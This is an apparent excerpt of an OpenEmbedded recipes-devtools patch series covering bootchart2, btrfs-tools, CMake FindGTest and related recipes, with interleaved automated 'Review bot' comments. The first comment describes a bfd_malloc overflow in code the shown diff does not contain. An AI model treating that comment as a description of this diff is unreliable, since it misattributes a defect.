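Review bot: The allocation size `size + count * sizeof (asymbol)` passed to `bfd_malloc` is computed without an overflow check, while `count` comes from `dysymtab->nindirectsyms` in the input file. If that value is not already bounded where the dysymtab is read (not visible here), a wrapped size on a 32-bit host would leave `names = (char *) (s + count)` pointing outside the block, and the later `n >= count` and `size < len + sizeof (stub)` tests would not catch it. A guard before the allocation, such as `if (count > ((size_t) -1 - size) / sizeof (asymbol)) return -1;`, would make the bound explicit. The function starts and ends outside the inner hunks.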
diff --git a/meta/recipes-devtools/bootchart2/bootchart2/0001-bootchartd.in-make-sure-only-one-bootchartd-process.patch b/meta/recipes-devtools/bootchart2/bootchart2/0001-bootchartd.in-make-sure-only-one-bootchartd-process.patch
new file mode 100644
index 0000000000..3cb8a3c2a2
--- /dev/null
+++ b/meta/recipes-devtools/bootchart2/bootchart2/0001-bootchartd.in-make-sure-only-one-bootchartd-process.patch
@@ -0,0 +1,68 @@
+From 988ca784d4840c87509e770a21d5d22105af8668 Mon Sep 17 00:00:00 2001
+From: Mingli Yu <mingli.yu@windriver.com>
+Date: Fri, 5 Nov 2021 11:18:07 +0800
+Subject: [PATCH] bootchartd.in: make sure only one bootchartd process
+
+When boot with "init=/sbin/bootchartd" as below:
+ # runqemu qemux86 bootparams="init=/sbin/bootchartd"
+
+There are two bootchartd process after boot [1].
+ # ps -ef | grep bootchart
+root 101 1 0 03:27 ? 00:00:00 /bin/sh /sbin/bootchartd
+root 103 101 8 03:27 ? 00:00:02 /lib64/bootchart/bootchart-collector 50
+root 106 1 0 03:27 ? 00:00:00 /bin/sh /sbin/bootchartd
+root 792 106 0 03:27 ? 00:00:00 /lib64/bootchart/bootchart-collector --usleep 1000000
+root 794 725 0 03:27 ttyS0 00:00:00 grep bootchart
+
+ # /sbin/bootchartd stop
+[bootchart] bootchart-collector started as pid 596 with 2 args:
+[bootchart] '--dump'
+[bootchart] '/tmp/bootchart.3lXpVDAq3v'
+[bootchart] Extracting profile data from pid 204
+[bootchart] map 0xbed9a000 -> 0xbedbb000 size: 132k from 'bed9a000' 'bedbb000'
+[bootchart] read 135168 bytes of 135168
+[bootchart] reading 150 chunks (of 150) ...
+[bootchart] wrote 18760 kbB
+[bootchart] bootchart-collector pid: 596 unmounted proc / clean exit
+
+But there still one process exist after the above stop command finish.
+ # ps -ef | grep bootchartd
+root 202 1 0 09:09 ? 00:00:00 /bin/sh /sbin/bootchartd
+root 629 516 0 09:10 ? 00:00:00 grep bootchartd
+
+Remove the wait_boot which used to wait the boot process to finish to
+make sure only one bootchartd process and meanwhile we don't need the
+wait_boot logic because we either use "/sbin/bootchartd stop" to stop
+the bootchartd manually or install package bootchartd-stop-initscript
+altogether with bootchart2 to stop bootchartd automatically after boot.
+
+After patch:
+ # ps -ef | grep bootchart
+ root 101 1 0 03:36 ? 00:00:00 /bin/sh /sbin/bootchartd
+ root 103 101 6 03:36 ? 00:00:04 /lib64/bootchart/bootchart-collector 50
+ root 596 592 0 03:37 ttyS0 00:00:00 grep bootchart
+
+[1] https://github.com/xrmx/bootchart/issues/94
+
+Upstream-Status: Submitted [https://github.com/xrmx/bootchart/pull/95]
+
+Signed-off-by: Mingli Yu <mingli.yu@windriver.com>
+---
+ bootchartd.in | 1 -
+ 1 file changed, 1 deletion(-)
+
+diff --git a/bootchartd.in b/bootchartd.in
+index 7979ef9..f0e466d 100755
+--- a/bootchartd.in
++++ b/bootchartd.in
+@@ -183,7 +183,6 @@ if [ $$ -eq 1 ]; then
+ else # running inside the main system
+ echo "bootchart: no initrd used; starting"
+ start &
+- wait_boot &
+ # wait a little, until the collector is going, before allowing
+ # the rest of the system to charge ahead, so we catch it
+ $USLEEP 250000
+--
+2.17.1
+
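Review bot: With `wait_boot &` removed, nothing in this branch of bootchartd.in stops the collector once boot completes; the commit message relies on `/sbin/bootchartd stop` being run by hand or on bootchartd-stop-initscript being installed. The recipe hunks in this commit do not show that package being pulled in, so an image with only bootchart2 would presumably keep bootchart-collector sampling indefinitely. Consider an `RRECOMMENDS` on bootchartd-stop-initscript in the recipe, or a comment at the removed line stating the requirement, e.g. `# collector must be stopped by 'bootchartd stop' or bootchartd-stop-initscript`. The `wait_boot` function itself is outside the hunk and, if it is now unused, could be dropped in the same patch.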
diff --git a/meta/recipes-devtools/bootchart2/bootchart2_0.14.8.bb b/meta/recipes-devtools/bootchart2/bootchart2_0.14.9.bb
index a938b2da49..7f05bd1b0b 100644
--- a/meta/recipes-devtools/bootchart2/bootchart2_0.14.8.bb
+++ b/meta/recipes-devtools/bootchart2/bootchart2_0.14.9.bb
@@ -90,15 +90,15 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=44ac4678311254db62edf8fd39cb8124"
UPSTREAM_CHECK_GITTAGREGEX = "(?P<pver>\d+\.\d+(\.\d+)*)"
-SRC_URI = "git://github.com/xrmx/bootchart.git \
+SRC_URI = "git://github.com/xrmx/bootchart.git;branch=master;protocol=https \
file://bootchartd_stop.sh \
file://0001-collector-Allocate-space-on-heap-for-chunks.patch \
file://0001-bootchart2-support-usrmerge.patch \
+ file://0001-bootchartd.in-make-sure-only-one-bootchartd-process.patch \
"
S = "${WORKDIR}/git"
-SRCREV = "331ada031f1d65f6d934d918f896e1c708c64bf7"
-PV .= "+git${SRCPV}"
+SRCREV = "868a2afab9da34f32c007d773b77253c93104636"
inherit systemd update-rc.d python3native update-alternatives
@@ -144,7 +144,7 @@ do_install () {
PACKAGES =+ "pybootchartgui"
FILES_pybootchartgui += "${PYTHON_SITEPACKAGES_DIR}/pybootchartgui ${bindir}/pybootchartgui"
-RDEPENDS_pybootchartgui = "python3-pycairo python3-compression python3-image python3-shell python3-compression python3-codecs"
+RDEPENDS_pybootchartgui = "python3-pycairo python3-compression python3-image python3-math python3-shell python3-compression python3-codecs"
RDEPENDS_${PN}_class-target += "${@bb.utils.contains('DISTRO_FEATURES', 'sysvinit', 'sysvinit-pidof', 'procps', d)}"
RDEPENDS_${PN}_class-target += "lsb-release"
DEPENDS_append_class-native = " python3-pycairo-native"
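Review bot: The new `RDEPENDS_pybootchartgui` value lists `python3-compression` twice; the duplicate was already on the old line and is carried over while `python3-math` is added. Dropping it keeps the list readable: `RDEPENDS_pybootchartgui = "python3-pycairo python3-compression python3-image python3-math python3-shell python3-codecs"`.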
diff --git a/meta/recipes-devtools/btrfs-tools/btrfs-tools_5.4.1.bb b/meta/recipes-devtools/btrfs-tools/btrfs-tools_5.4.1.bb
index cdc971cf5d..be61916cc6 100644
--- a/meta/recipes-devtools/btrfs-tools/btrfs-tools_5.4.1.bb
+++ b/meta/recipes-devtools/btrfs-tools/btrfs-tools_5.4.1.bb
@@ -15,7 +15,7 @@ DEPENDS_append_class-target = " udev"
RDEPENDS_${PN} = "libgcc"
SRCREV = "3fc2326d3474a5e4df2449f5e3043f7298501334"
-SRC_URI = "git://git.kernel.org/pub/scm/linux/kernel/git/kdave/btrfs-progs.git \
+SRC_URI = "git://git.kernel.org/pub/scm/linux/kernel/git/kdave/btrfs-progs.git;branch=master \
file://0001-Add-a-possibility-to-specify-where-python-modules-ar.patch \
"
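Review bot: The updated `SRC_URI` adds `;branch=master` but, unlike the bootchart2 and build-compare recipes changed in this same commit, leaves the fetch on the plain `git://` transport with no `protocol=https`. The pinned `SRCREV` means a tampered fetch should fail to yield the expected commit, but the unauthenticated transport is still an avoidable exposure and is blocked on some networks. Suggested line: `SRC_URI = "git://git.kernel.org/pub/scm/linux/kernel/git/kdave/btrfs-progs.git;branch=master;protocol=https \`.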
@@ -49,4 +49,4 @@ do_install_append() {
fi
}
-BBCLASSEXTEND = "native"
+BBCLASSEXTEND = "native nativesdk"
diff --git a/meta/recipes-devtools/build-compare/build-compare_git.bb b/meta/recipes-devtools/build-compare/build-compare_git.bb
index b0560cc277..6afa9a0d68 100644
--- a/meta/recipes-devtools/build-compare/build-compare_git.bb
+++ b/meta/recipes-devtools/build-compare/build-compare_git.bb
@@ -5,7 +5,7 @@ HOMEPAGE = "https://github.com/openSUSE/build-compare"
LICENSE = "GPLv2"
LIC_FILES_CHKSUM = "file://COPYING;md5=751419260aa954499f7abaabaa882bbe"
-SRC_URI = "git://github.com/openSUSE/build-compare.git \
+SRC_URI = "git://github.com/openSUSE/build-compare.git;branch=master;protocol=https \
file://Ignore-DWARF-sections.patch;striplevel=1 \
"
diff --git a/meta/recipes-devtools/cdrtools/cdrtools-native_3.01.bb b/meta/recipes-devtools/cdrtools/cdrtools-native_3.01.bb
index c08da6cdca..cd2ca8dbe9 100644
--- a/meta/recipes-devtools/cdrtools/cdrtools-native_3.01.bb
+++ b/meta/recipes-devtools/cdrtools/cdrtools-native_3.01.bb
@@ -3,6 +3,7 @@
# Released under the MIT license (see packages/COPYING)
SUMMARY = "A set of tools for CD recording, including cdrecord"
HOMEPAGE = "http://sourceforge.net/projects/cdrtools/"
+DESCRIPTION = "cdrecord tool is Highly portable CD/DVD/BluRay command line recording software."
SECTION = "console/utils"
LICENSE = "GPLv2 & CDDL-1.0 & LGPLv2.1+"
LIC_FILES_CHKSUM = "file://COPYING;md5=32f68170be424c2cd64804337726b312"
diff --git a/meta/recipes-devtools/cmake/cmake-native_3.16.5.bb b/meta/recipes-devtools/cmake/cmake-native_3.16.5.bb
index b2952ee5f5..96a7be6770 100644
--- a/meta/recipes-devtools/cmake/cmake-native_3.16.5.bb
+++ b/meta/recipes-devtools/cmake/cmake-native_3.16.5.bb
@@ -7,6 +7,7 @@ SRC_URI += "file://OEToolchainConfig.cmake \
file://environment.d-cmake.sh \
file://0001-CMakeDetermineSystem-use-oe-environment-vars-to-load.patch \
file://0005-Disable-use-of-ext2fs-ext2_fs.h-by-cmake-s-internal-.patch \
+ file://0006-cmake-FindGTest-Add-target-for-gmock-library.patch \
"
diff --git a/meta/recipes-devtools/cmake/cmake/0006-cmake-FindGTest-Add-target-for-gmock-library.patch b/meta/recipes-devtools/cmake/cmake/0006-cmake-FindGTest-Add-target-for-gmock-library.patch
new file mode 100644
index 0000000000..267f586a71
--- /dev/null
+++ b/meta/recipes-devtools/cmake/cmake/0006-cmake-FindGTest-Add-target-for-gmock-library.patch
@@ -0,0 +1,255 @@
+From 39eae0d6c1b398f18761abac7f55944f0290f8a1 Mon Sep 17 00:00:00 2001
+From: Eero Aaltonen <eero.aaltonen@iki.fi>
+Date: Sun, 17 Oct 2021 17:13:07 +0300
+Subject: [PATCH] FindGTest: Add target for gmock library
+
+`googlemock` has been absorbed into the
+[googletest](https://github.com/google/googletest) project and is built
+and installed from the same source tree.
+
+As GTest may be built with or without GMock, skip GMock if it is not
+present.
+
+Do not provide result variables for GMock. They are not provided by
+upstream GTest's CMake Package Configuration File.
+
+Also update the test case to cover linking to `GTest::gmock`.
+
+The patch was imported from the Kitware git server
+(git@gitlab.kitware.com:cmake/cmake.git) as of commit id
+50bf457a0dd857cf976b22c5be7d333493233d1e
+
+Patch was modified to support upper case variable `GTEST_FOUND`.
+
+Upstream-Status: Accepted [https://gitlab.kitware.com/cmake/cmake/-/merge_requests/6632]
+Milestone: 3.23.0
+
+Signed-off-by: Eero Aaltonen <eero.aaltonen@vaisala.com>
+---
+ .../dev/FindGTest-target-for-gmock.rst | 4 +
+ Modules/FindGTest.cmake | 133 +++++++++++++++---
+ Tests/FindGTest/Test/CMakeLists.txt | 4 +
+ 3 files changed, 121 insertions(+), 20 deletions(-)
+ create mode 100644 Help/release/dev/FindGTest-target-for-gmock.rst
+
+diff --git a/Help/release/dev/FindGTest-target-for-gmock.rst b/Help/release/dev/FindGTest-target-for-gmock.rst
+new file mode 100644
+index 0000000000..f78242c80e
+--- /dev/null
++++ b/Help/release/dev/FindGTest-target-for-gmock.rst
+@@ -0,0 +1,4 @@
++FindGTest-target-for-gmock
++--------------------------
++
++* The :module:`FindGTest` module now provides a target for GMock, if found.
+diff --git a/Modules/FindGTest.cmake b/Modules/FindGTest.cmake
+index e015a9840f..0331049594 100644
+--- a/Modules/FindGTest.cmake
++++ b/Modules/FindGTest.cmake
+@@ -7,10 +7,23 @@ FindGTest
+
+ Locate the Google C++ Testing Framework.
+
++.. versionadded:: 3.20
++ Upstream ``GTestConfig.cmake`` is used if possible.
++
+ Imported targets
+ ^^^^^^^^^^^^^^^^
+
+-This module defines the following :prop_tgt:`IMPORTED` targets:
++ This module defines the following :prop_tgt:`IMPORTED` targets:
++
++``GTest::gtest``
++ The Google Test ``gtest`` library, if found; adds Thread::Thread
++ automatically
++``GTest::gtest_main``
++ The Google Test ``gtest_main`` library, if found
++
++.. deprecated:: 3.20
++ For backwards compatibility, this module defines additionally the
++ following deprecated :prop_tgt:`IMPORTED` targets (available since 3.5):
+
+ ``GTest::GTest``
+ The Google Test ``gtest`` library, if found; adds Thread::Thread
+@@ -18,7 +31,6 @@ This module defines the following :prop_tgt:`IMPORTED` targets:
+ ``GTest::Main``
+ The Google Test ``gtest_main`` library, if found
+
+-
+ Result variables
+ ^^^^^^^^^^^^^^^^
+
+@@ -146,8 +158,42 @@ function(__gtest_import_library _target _var _config)
+ endif()
+ endfunction()
+
++function(__gtest_define_backwards_compatible_library_targets)
++ set(GTEST_BOTH_LIBRARIES ${GTEST_LIBRARIES} ${GTEST_MAIN_LIBRARIES} PARENT_SCOPE)
++
++ # Add targets mapping the same library names as defined in
++ # older versions of CMake's FindGTest
++ if(NOT TARGET GTest::GTest)
++ add_library(GTest::GTest INTERFACE IMPORTED)
++ target_link_libraries(GTest::GTest INTERFACE GTest::gtest)
++ endif()
++ if(NOT TARGET GTest::Main)
++ add_library(GTest::Main INTERFACE IMPORTED)
++ target_link_libraries(GTest::Main INTERFACE GTest::gtest_main)
++ endif()
++endfunction()
++
+ #
+
++include(${CMAKE_CURRENT_LIST_DIR}/FindPackageHandleStandardArgs.cmake)
++
++# first specifically look for the CMake version of GTest
++find_package(GTest QUIET NO_MODULE)
++
++# if we found the GTest cmake package then we are done, and
++# can print what we found and return.
++if(GTest_FOUND)
++ set(GTEST_FOUND ${GTest_FOUND})
++ FIND_PACKAGE_HANDLE_STANDARD_ARGS(GTest HANDLE_COMPONENTS CONFIG_MODE)
++
++ set(GTEST_LIBRARIES GTest::gtest)
++ set(GTEST_MAIN_LIBRARIES GTest::gtest_main)
++
++ __gtest_define_backwards_compatible_library_targets()
++
++ return()
++endif()
++
+ if(NOT DEFINED GTEST_MSVC_SEARCH)
+ set(GTEST_MSVC_SEARCH MD)
+ endif()
+@@ -194,50 +240,97 @@ if(MSVC AND GTEST_MSVC_SEARCH STREQUAL "MD")
+ __gtest_find_library(GTEST_LIBRARY_DEBUG gtest-mdd gtestd)
+ __gtest_find_library(GTEST_MAIN_LIBRARY gtest_main-md gtest_main)
+ __gtest_find_library(GTEST_MAIN_LIBRARY_DEBUG gtest_main-mdd gtest_maind)
++ __gtest_find_library(GMOCK_LIBRARY gmock-md gmock)
++ __gtest_find_library(GMOCK_LIBRARY_DEBUG gmock-mdd gmockd)
++ __gtest_find_library(GMOCK_MAIN_LIBRARY gmock_main-md gmock_main)
++ __gtest_find_library(GMOCK_MAIN_LIBRARY_DEBUG gmock_main-mdd gmock_maind)
+ else()
+ __gtest_find_library(GTEST_LIBRARY gtest)
+ __gtest_find_library(GTEST_LIBRARY_DEBUG gtestd)
+ __gtest_find_library(GTEST_MAIN_LIBRARY gtest_main)
+ __gtest_find_library(GTEST_MAIN_LIBRARY_DEBUG gtest_maind)
++ __gtest_find_library(GMOCK_LIBRARY gmock)
++ __gtest_find_library(GMOCK_LIBRARY_DEBUG gmockd)
++ __gtest_find_library(GMOCK_MAIN_LIBRARY gmock_main)
++ __gtest_find_library(GMOCK_MAIN_LIBRARY_DEBUG gmock_maind)
+ endif()
+
+-include(${CMAKE_CURRENT_LIST_DIR}/FindPackageHandleStandardArgs.cmake)
+ FIND_PACKAGE_HANDLE_STANDARD_ARGS(GTest DEFAULT_MSG GTEST_LIBRARY GTEST_INCLUDE_DIR GTEST_MAIN_LIBRARY)
+
+-if(GTEST_FOUND)
++if(GMOCK_LIBRARY AND GMOCK_MAIN_LIBRARY)
++ set(GMock_FOUND True)
++else()
++ set(GMock_FOUND False)
++endif()
++
++if(GTest_FOUND)
+ set(GTEST_INCLUDE_DIRS ${GTEST_INCLUDE_DIR})
+ __gtest_append_debugs(GTEST_LIBRARIES GTEST_LIBRARY)
+ __gtest_append_debugs(GTEST_MAIN_LIBRARIES GTEST_MAIN_LIBRARY)
+- set(GTEST_BOTH_LIBRARIES ${GTEST_LIBRARIES} ${GTEST_MAIN_LIBRARIES})
+
+ find_package(Threads QUIET)
+
+- if(NOT TARGET GTest::GTest)
++ if(NOT TARGET GTest::gtest)
+ __gtest_determine_library_type(GTEST_LIBRARY)
+- add_library(GTest::GTest ${GTEST_LIBRARY_TYPE} IMPORTED)
++ add_library(GTest::gtest ${GTEST_LIBRARY_TYPE} IMPORTED)
+ if(TARGET Threads::Threads)
+- set_target_properties(GTest::GTest PROPERTIES
++ set_target_properties(GTest::gtest PROPERTIES
+ INTERFACE_LINK_LIBRARIES Threads::Threads)
+ endif()
+ if(GTEST_LIBRARY_TYPE STREQUAL "SHARED")
+- set_target_properties(GTest::GTest PROPERTIES
++ set_target_properties(GTest::gtest PROPERTIES
+ INTERFACE_COMPILE_DEFINITIONS "GTEST_LINKED_AS_SHARED_LIBRARY=1")
+ endif()
+ if(GTEST_INCLUDE_DIRS)
+- set_target_properties(GTest::GTest PROPERTIES
++ set_target_properties(GTest::gtest PROPERTIES
+ INTERFACE_INCLUDE_DIRECTORIES "${GTEST_INCLUDE_DIRS}")
+ endif()
+- __gtest_import_library(GTest::GTest GTEST_LIBRARY "")
+- __gtest_import_library(GTest::GTest GTEST_LIBRARY "RELEASE")
+- __gtest_import_library(GTest::GTest GTEST_LIBRARY "DEBUG")
++ __gtest_import_library(GTest::gtest GTEST_LIBRARY "")
++ __gtest_import_library(GTest::gtest GTEST_LIBRARY "RELEASE")
++ __gtest_import_library(GTest::gtest GTEST_LIBRARY "DEBUG")
+ endif()
+- if(NOT TARGET GTest::Main)
++ if(NOT TARGET GTest::gtest_main)
+ __gtest_determine_library_type(GTEST_MAIN_LIBRARY)
+- add_library(GTest::Main ${GTEST_MAIN_LIBRARY_TYPE} IMPORTED)
+- set_target_properties(GTest::Main PROPERTIES
+- INTERFACE_LINK_LIBRARIES "GTest::GTest")
+- __gtest_import_library(GTest::Main GTEST_MAIN_LIBRARY "")
+- __gtest_import_library(GTest::Main GTEST_MAIN_LIBRARY "RELEASE")
+- __gtest_import_library(GTest::Main GTEST_MAIN_LIBRARY "DEBUG")
++ add_library(GTest::gtest_main ${GTEST_MAIN_LIBRARY_TYPE} IMPORTED)
++ set_target_properties(GTest::gtest_main PROPERTIES
++ INTERFACE_LINK_LIBRARIES "GTest::gtest")
++ __gtest_import_library(GTest::gtest_main GTEST_MAIN_LIBRARY "")
++ __gtest_import_library(GTest::gtest_main GTEST_MAIN_LIBRARY "RELEASE")
++ __gtest_import_library(GTest::gtest_main GTEST_MAIN_LIBRARY "DEBUG")
++ endif()
++
++ __gtest_define_backwards_compatible_library_targets()
++endif()
++
++if(GMock_FOUND)
++ if(NOT TARGET GTest::gmock)
++ __gtest_determine_library_type(GMOCK_LIBRARY)
++ add_library(GTest::gmock ${GMOCK_LIBRARY_TYPE} IMPORTED)
++ set(_gmock_link_libraries "GTest::gtest")
++ if(TARGET Threads::Threads)
++ list(APPEND _gmock_link_libraries Threads::Threads)
++ endif()
++ set_target_properties(GTest::gmock PROPERTIES
++ INTERFACE_LINK_LIBRARIES "${_gmock_link_libraries}")
++ if(GMOCK_LIBRARY_TYPE STREQUAL "SHARED")
++ set_target_properties(GTest::gmock PROPERTIES
++ INTERFACE_COMPILE_DEFINITIONS "GMOCK_LINKED_AS_SHARED_LIBRARY=1")
++ endif()
++ if(GTEST_INCLUDE_DIRS)
++ set_target_properties(GTest::gmock PROPERTIES
++ INTERFACE_INCLUDE_DIRECTORIES "${GTEST_INCLUDE_DIRS}")
++ endif()
++ __gtest_import_library(GTest::gmock GMOCK_LIBRARY "")
++ __gtest_import_library(GTest::gmock GMOCK_LIBRARY "RELEASE")
++ __gtest_import_library(GTest::gmock GMOCK_LIBRARY "DEBUG")
++ endif()
++ if(NOT TARGET GTest::gmock_main)
++ __gtest_determine_library_type(GMOCK_MAIN_LIBRARY)
++ add_library(GTest::gmock_main ${GMOCK_MAIN_LIBRARY_TYPE} IMPORTED)
++ set_target_properties(GTest::gmock_main PROPERTIES
++ INTERFACE_LINK_LIBRARIES "GTest::gmock")
++ __gtest_import_library(GTest::gmock_main GMOCK_MAIN_LIBRARY "")
++ __gtest_import_library(GTest::gmock_main GMOCK_MAIN_LIBRARY "RELEASE")
++ __gtest_import_library(GTest::gmock_main GMOCK_MAIN_LIBRARY "DEBUG")
+ endif()
+ endif()
+diff --git a/Tests/FindGTest/Test/CMakeLists.txt b/Tests/FindGTest/Test/CMakeLists.txt
+index b65b9d28f6..7d3a378a65 100644
+--- a/Tests/FindGTest/Test/CMakeLists.txt
++++ b/Tests/FindGTest/Test/CMakeLists.txt
+@@ -12,3 +12,7 @@ add_executable(test_gtest_var main.cxx)
+ target_include_directories(test_gtest_var PRIVATE ${GTEST_INCLUDE_DIRS})
+ target_link_libraries(test_gtest_var PRIVATE ${GTEST_BOTH_LIBRARIES} ${CMAKE_THREAD_LIBS_INIT})
+ add_test(NAME test_gtest_var COMMAND test_gtest_var)
++
++add_executable(test_gmock_tgt main.cxx)
++target_link_libraries(test_gmock_tgt GTest::gmock_main)
++add_test(NAME test_gmock_tgt COMMAND test_gmock_tgt)
+--
+2.17.1
+
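Review bot: In the patched `Modules/FindGTest.cmake`, the `if(GMock_FOUND)` block sits outside `if(GTest_FOUND)`, yet `GTest::gmock` is given `GTest::gtest` as `INTERFACE_LINK_LIBRARIES` and takes its include directories from `GTEST_INCLUDE_DIRS`. Both are only set up inside the `GTest_FOUND` branch. If the gmock libraries are located but gtest is not, and the caller did not pass `REQUIRED`, the gmock targets would reference a target that was never created; guarding with `if(GTest_FOUND AND GMock_FOUND)` avoids that. Separately, the added documentation says `.. versionadded:: 3.20` and `.. deprecated:: 3.20` although the patch is applied to the 3.16.5 recipe, which deserves a line in the patch header.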
diff --git a/meta/recipes-devtools/cmake/cmake/OEToolchainConfig.cmake b/meta/recipes-devtools/cmake/cmake/OEToolchainConfig.cmake
index 398069eef2..870009c2ba 100644
--- a/meta/recipes-devtools/cmake/cmake/OEToolchainConfig.cmake
+++ b/meta/recipes-devtools/cmake/cmake/OEToolchainConfig.cmake
@@ -2,7 +2,6 @@ set( CMAKE_SYSTEM_NAME Linux )
set( CMAKE_C_FLAGS $ENV{CFLAGS} CACHE STRING "" FORCE )
set( CMAKE_CXX_FLAGS $ENV{CXXFLAGS} CACHE STRING "" FORCE )
set( CMAKE_ASM_FLAGS ${CMAKE_C_FLAGS} CACHE STRING "" FORCE )
-set( CMAKE_LDFLAGS_FLAGS ${CMAKE_CXX_FLAGS} CACHE STRING "" FORCE )
set( CMAKE_SYSROOT $ENV{OECORE_TARGET_SYSROOT} )
set( CMAKE_FIND_ROOT_PATH $ENV{OECORE_TARGET_SYSROOT} )
@@ -13,13 +12,13 @@ set( CMAKE_FIND_ROOT_PATH_MODE_PACKAGE ONLY )
set(CMAKE_FIND_LIBRARY_CUSTOM_LIB_SUFFIX "$ENV{OE_CMAKE_FIND_LIBRARY_CUSTOM_LIB_SUFFIX}")
-# Set CMAKE_SYSTEM_PROCESSOR from the sysroot name (assuming processor-distro-os).
-if ($ENV{SDKTARGETSYSROOT} MATCHES "/sysroots/([a-zA-Z0-9_-]+)-.+-.+")
- set(CMAKE_SYSTEM_PROCESSOR ${CMAKE_MATCH_1})
-endif()
+set( CMAKE_SYSTEM_PROCESSOR $ENV{OECORE_TARGET_ARCH} )
# Include the toolchain configuration subscripts
file( GLOB toolchain_config_files "${CMAKE_TOOLCHAIN_FILE}.d/*.cmake" )
foreach(config ${toolchain_config_files})
include(${config})
endforeach()
+
+unset(CMAKE_C_IMPLICIT_INCLUDE_DIRECTORIES)
+unset(CMAKE_CXX_IMPLICIT_INCLUDE_DIRECTORIES)
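Review bot: `CMAKE_SYSTEM_PROCESSOR` is now assigned unconditionally from `$ENV{OECORE_TARGET_ARCH}`, so it becomes an empty string whenever the toolchain file is loaded without that variable in the environment. The removed code left it untouched when the sysroot path did not match. A guard keeps that fall-through: `if(DEFINED ENV{OECORE_TARGET_ARCH})`, then `set( CMAKE_SYSTEM_PROCESSOR $ENV{OECORE_TARGET_ARCH} )`, then `endif()`. The two `unset(...IMPLICIT_INCLUDE_DIRECTORIES)` lines appended at the end would also benefit from a comment stating why they are needed and why they come after the include loop.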
diff --git a/meta/recipes-devtools/createrepo-c/createrepo-c_0.15.7.bb b/meta/recipes-devtools/createrepo-c/createrepo-c_0.15.7.bb
index c6a53ffece..3c403a4077 100644
--- a/meta/recipes-devtools/createrepo-c/createrepo-c_0.15.7.bb
+++ b/meta/recipes-devtools/createrepo-c/createrepo-c_0.15.7.bb
@@ -4,7 +4,7 @@ HOMEPAGE = "https://github.com/rpm-software-management/createrepo_c/wiki"
LICENSE = "GPLv2"
LIC_FILES_CHKSUM = "file://COPYING;md5=b234ee4d69f5fce4486a80fdaf4a4263"
-SRC_URI = "git://github.com/rpm-software-management/createrepo_c \
+SRC_URI = "git://github.com/rpm-software-management/createrepo_c;branch=master;protocol=https \
file://0001-Do-not-set-PYTHON_INSTALL_DIR-by-running-python.patch \
"
diff --git a/meta/recipes-devtools/dejagnu/dejagnu_1.6.2.bb b/meta/recipes-devtools/dejagnu/dejagnu_1.6.2.bb
index 10220ebc91..ce242c3593 100644
--- a/meta/recipes-devtools/dejagnu/dejagnu_1.6.2.bb
+++ b/meta/recipes-devtools/dejagnu/dejagnu_1.6.2.bb
@@ -1,11 +1,13 @@
SUMMARY = "GNU unit testing framework, written in Expect and Tcl"
DESCRIPTION = "DejaGnu is a framework for testing other programs. Its purpose \
is to provide a single front end for all tests."
+HOMEPAGE = "https://www.gnu.org/software/dejagnu/"
LICENSE = "GPLv2"
LIC_FILES_CHKSUM = "file://COPYING;md5=d32239bcb673463ab874e80d47fae504"
SECTION = "devel"
DEPENDS += "expect-native"
+RDEPENDS_${PN} = "expect"
inherit autotools
diff --git a/meta/recipes-devtools/desktop-file-utils/desktop-file-utils_0.24.bb b/meta/recipes-devtools/desktop-file-utils/desktop-file-utils_0.24.bb
index aecba07235..0418ae0c5f 100644
--- a/meta/recipes-devtools/desktop-file-utils/desktop-file-utils_0.24.bb
+++ b/meta/recipes-devtools/desktop-file-utils/desktop-file-utils_0.24.bb
@@ -1,6 +1,7 @@
-SECTION = "console/utils"
SUMMARY = "Command line utilities for working with *.desktop files"
+DESCRIPTION = "desktop-file-utils contains a few command line utilities for working with desktop entries"
HOMEPAGE = "http://www.freedesktop.org/wiki/Software/desktop-file-utils"
+SECTION = "console/utils"
LICENSE = "GPLv2+"
LIC_FILES_CHKSUM = "file://COPYING;md5=b234ee4d69f5fce4486a80fdaf4a4263 \
diff --git a/meta/recipes-devtools/devel-config/distcc-config.bb b/meta/recipes-devtools/devel-config/distcc-config.bb
index 3cd661d543..db9e8bbcc9 100644
--- a/meta/recipes-devtools/devel-config/distcc-config.bb
+++ b/meta/recipes-devtools/devel-config/distcc-config.bb
@@ -1,4 +1,5 @@
SUMMARY = "Sets up distcc for compilation on the target device"
+DESCRIPTION = "${SUMMARY}"
LICENSE = "MIT"
LIC_FILES_CHKSUM = "file://${COREBASE}/meta/COPYING.MIT;md5=3da9cfbcb788c80a0384361b4de20420"
diff --git a/meta/recipes-devtools/diffstat/diffstat_1.63.bb b/meta/recipes-devtools/diffstat/diffstat_1.63.bb
index 61b2ea5dc2..863f924b22 100644
--- a/meta/recipes-devtools/diffstat/diffstat_1.63.bb
+++ b/meta/recipes-devtools/diffstat/diffstat_1.63.bb
@@ -5,7 +5,7 @@ reviewing large, complex patch files."
HOMEPAGE = "http://invisible-island.net/diffstat/"
SECTION = "devel"
LICENSE = "MIT"
-LIC_FILES_CHKSUM = "file://install-sh;endline=42;md5=b3549726c1022bee09c174c72a0ca4a5"
+LIC_FILES_CHKSUM = "file://COPYING;md5=a3d0bb117493e804b0c1a868ddf23321"
SRC_URI = "http://invisible-mirror.net/archives/${BPN}/${BP}.tgz \
file://run-ptest \
@@ -16,8 +16,6 @@ SRC_URI = "http://invisible-mirror.net/archives/${BPN}/${BP}.tgz \
SRC_URI[md5sum] = "b9272ec8af6257103261ec3622692991"
SRC_URI[sha256sum] = "7eddd53401b99b90bac3f7ebf23dd583d7d99c6106e67a4f1161b7a20110dc6f"
-S = "${WORKDIR}/diffstat-${PV}"
-
inherit autotools gettext ptest
EXTRA_AUTORECONF += "--exclude=aclocal"
diff --git a/meta/recipes-devtools/distcc/distcc_3.3.3.bb b/meta/recipes-devtools/distcc/distcc_3.3.3.bb
index c52f136be8..2a74a068f1 100644
--- a/meta/recipes-devtools/distcc/distcc_3.3.3.bb
+++ b/meta/recipes-devtools/distcc/distcc_3.3.3.bb
@@ -1,6 +1,7 @@
SUMMARY = "A parallel build system"
DESCRIPTION = "distcc is a parallel build system that distributes \
compilation of C/C++/ObjC code across machines on a network."
+HOMEPAGE = "https://github.com/distcc/distcc"
SECTION = "devel"
LICENSE = "GPLv2"
LIC_FILES_CHKSUM = "file://COPYING;md5=94d55d512a9ba36caa9b7df079bae19f"
@@ -14,7 +15,7 @@ PACKAGECONFIG[popt] = "--without-included-popt,--with-included-popt,popt"
RRECOMMENDS_${PN}-server = "avahi-daemon"
-SRC_URI = "git://github.com/distcc/distcc.git \
+SRC_URI = "git://github.com/distcc/distcc.git;branch=master;protocol=https \
file://fix-gnome.patch \
file://separatebuilddir.patch \
file://default \
